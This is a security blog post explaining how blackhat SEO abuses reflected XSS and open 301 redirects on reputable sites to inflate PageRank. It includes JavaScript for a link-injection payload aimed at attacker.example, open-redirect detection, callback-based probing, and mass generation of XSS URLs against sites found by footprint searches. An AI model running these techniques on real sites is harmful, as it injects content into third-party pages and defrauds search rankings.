It’s probably about time I talked about how XSS works with SEO (search engine optimization). It’s one of the fastest growing reasons that people use both XSS and redirection attacks. Here’s the scenario: if you look at how Google PageRank works, you can see that the more people who link to you, the better (let’s set aside the idea of spam domains for a second).
XSS allows you to put HTML content on a page, pure and simple. When GoogleBot surfs the internet, it attempts to find the number and quality of the links to your domain to calculate how relevant your content is. Each link is roughly the equivalent of a vote, and some votes are worth more than others, depending on the standing of the website the link resides on.
There are two attacks relevant to this: one is reflected or stored XSS (DOM based doesn’t work for this, sorry), and the other is redirection attacks. If your link shows up on a very well respected domain, it will rank higher in Google. So if you were to find a few hundred really well respected domains with XSS issues, the only trick is to get them indexed, and you have achieved much higher PageRank. Redirection works the same way, depending on what type of redirect is used. DOM based redirects, again, don’t work for this, but a simple 301 redirect does (a 302 doesn’t help you, since it isn’t considered permanent).
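To make the XSS half of that concrete, here is roughly what an injected “vote” looks like. The endpoint, parameter name, and domains below are all made up for illustration; the point is just that a reflected parameter which echoes HTML back unescaped turns the victim’s page into a page that links to you.

```javascript
// Hypothetical reflected-XSS "vote": victim.example echoes the q
// parameter back into its search results page unescaped, so the
// response now contains a real anchor tag pointing at the attacker.
var payload = '<a href="http://attacker.example/">keyword</a>';
var attackUrl = 'http://victim.example/search?q=' + encodeURIComponent(payload);
// Get attackUrl indexed, and to a crawler the well-respected victim
// page appears to link to attacker.example with the anchor text "keyword".
```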
Now take super motivated and pretty technically competent SEO blackhat guys, who are already battling it out with the likes of Matt Cutts (from Google) and Jeremy Zawodny (from Yahoo!), and you have a pretty scary playing field.
As a test, I threw together a very crappy little Greasemonkey script that logs simple redirection attacks, since those are usually far more benign than XSS, and within a few minutes I was finding dozens of potential redirects. Getting those indexed would be fairly trivial for anyone in the SEO industry. That could eventually force Google to modify their algorithm to ignore things like 301 redirects as a “vote” in cases where Google has never seen that particular URL before.
Here’s the crappy redirect detection Greasemonkey script. I don’t recommend using it, because it sucks, but it was a good proof of concept.
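In rough terms, the heuristic boils down to something like this (a simplified sketch rather than the script itself; the function name is just for illustration): flag any link whose query string carries a full URL as a parameter value, which is the classic shape of a redirector endpoint.

```javascript
// Simplified sketch of the detection heuristic: a link is a candidate
// open redirect if some query-string parameter's value is itself a full
// URL (plain or percent-encoded) -- the usual shape of a redirector.
function looksLikeOpenRedirect(href) {
  var q = href.indexOf('?');
  if (q === -1) return false; // no query string, nothing to inspect
  var query = href.slice(q + 1);
  // Match param=http:// or param=https:// (also the %-encoded form).
  return /(^|&)[^=&]+=https?(%3a%2f%2f|:\/\/)/i.test(query);
}
```

In the Greasemonkey version, the same check just runs over every entry in `document.links` and logs any hits for later review.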
Here’s the super short redirect log of what I was able to add in just a few minutes of surfing around (yes, I was hitting a few of my girlfriend’s trashy gossip sites at the time for lack of better targets, sue me, I wasn’t feeling creative at the time). Most of them do not work, but the ones that do could potentially help page rank.
Now granted, a good chunk of these do not work, but that actually shouldn’t matter much. Even without testing, you can send multiple possible attempts to Google; if 80% of them fail, you aren’t giving anything up, since the failures are still valid-looking links that probably hit some custom error logic. At worst it looks like you are linking to a lot of custom error pages. So pruning the redirect attack list may or may not help.
I did some tests with a prior version that I had up and running about a year ago (before the machine I was using crashed and died), where I did some automated testing by sending my browser to potentially thousands of URLs in just a few minutes and waiting for them to redirect back to my own custom domain with a particular URL parameter attached. That way I was able to detect what would work in a browser. That still wasn’t 100% predictive of what would and wouldn’t work, because you also get a certain amount of DOM based reflected XSS and DOM based redirects in there, but it was an interesting test.
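The probe construction for that kind of run amounts to something like the following. The function name and callback host are illustrative, not what I actually ran: you rewrite the suspected redirect parameter to point at a logging endpoint you control, tagged with an id so the callback tells you which target worked.

```javascript
// Rewrite a suspected redirect parameter so that a working redirect
// bounces the browser back to a logging host under our control,
// carrying an id that identifies which target URL succeeded.
// All hostnames and names here are examples.
function buildProbe(targetUrl, param, callbackBase, id) {
  var callback = callbackBase + '?probe=' + encodeURIComponent(id);
  var pattern = new RegExp('([?&]' + param + '=)[^&]*');
  return targetUrl.replace(pattern, '$1' + encodeURIComponent(callback));
}
```

Point the browser at a few thousand of these, and every `?probe=` hit in the callback host’s logs is a redirect that actually fires.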
I’m really not interested in most forms of XSS for this test; rather, I am primarily interested in redirects, and not redirects that require POST parameters to attack, but ones driven by the URL alone. That way it is easier to get Google to spider the domain with your custom URL. There are definitely more ways to attack this with stored XSS, but those are more difficult to detect with automated tools.
Probably the most effective way of doing this would be to set up a Googlebot-like robot that scoured the page looking for your link in valid HTML syntax (not inside script tags). That level of parsing, and the automated robot to go with it, was beyond where I really wanted to go just to prove a point, but it’s definitely possible. For someone with more time on their hands, I could see this being a super powerful SEO tool.
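A minimal version of that check could look like the sketch below, using naive regex parsing purely for illustration; a serious bot would parse the DOM properly rather than trust regexes against arbitrary HTML.

```javascript
// Crude check: strip <script> blocks, then see whether the link still
// appears as real anchor markup. A link that only exists inside script
// won't count as a crawlable vote.
function linkIsIndexable(html, href) {
  var noScripts = html.replace(/<script[\s\S]*?<\/script>/gi, '');
  return noScripts.toLowerCase().indexOf('href="' + href.toLowerCase() + '"') !== -1;
}
```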
As a side note, I was talking with quadzilla from SEO Blackhat (who, btw, is running an SEO blackjack tournament for anyone who is interested) and he gave me another idea regarding XSS detection that I have been thinking about for quite a while. One of the major problems on the internet today is the fact that a ton of websites are running canned software with bugs in it (Drupal, PHP-Nuke, WordPress, etc.). If you subscribe to some of the webappsec mailing lists, you can see the sheer volume of new XSS exploits being discovered on a daily basis. It’s fairly trivial to use Google to detect which websites are running a particular piece of software (by searching for keywords used by that software), and then use the returned lists of sites to launch automated XSS attacks to improve PageRank. Pretty scary, and pretty easy.
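The pipeline that idea describes can be sketched like this. The path, payload, and hostnames here are all hypothetical; the point is just how mechanically the footprint search results cross with a known exploit.

```javascript
// Hypothetical vulnerable path for some canned package; in practice the
// site list comes from a search-engine footprint query and the path from
// a public XSS disclosure for that package.
var knownXssPath = '/search.php?q='; // made-up vulnerable endpoint
var payload = '<a href="http://attacker.example/">keyword</a>';

// Cross the list of sites returned by a footprint search with the known
// reflected-XSS path to get one candidate attack URL per site.
function candidateUrls(sites) {
  return sites.map(function (site) {
    return 'http://' + site + knownXssPath + encodeURIComponent(payload);
  });
}
```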
I’ll write more on this later, but I wanted to get this one out of my brain.
Here are some links to SEO sites if you just want to familiarize yourself with the SEO domain:
- Shoemoney - Skills to Pay the Bills
- Jim Boykin’s Internet Marketing Blog
- Jeremy Zawodny’s Blog
- Matt Cutts: Gadgets, Google and SEO
- Daily SearchCast - Search Engine News Recap
- SEO Egghead
- Search Engine Watch
- SEO Blackhat: Blackhat SEO Blog
- A List Apart
- JenSense - Making Sense of Contextual Advertising
- Search Engine Blog.com
- Dave Naylor
- Secure SEO
- Black Hat Seo
- John Battelle’s Search Blog
- SEO by the Sea
- Greywolf’s SEO Blog
- SEO Roundtable
- I Love Google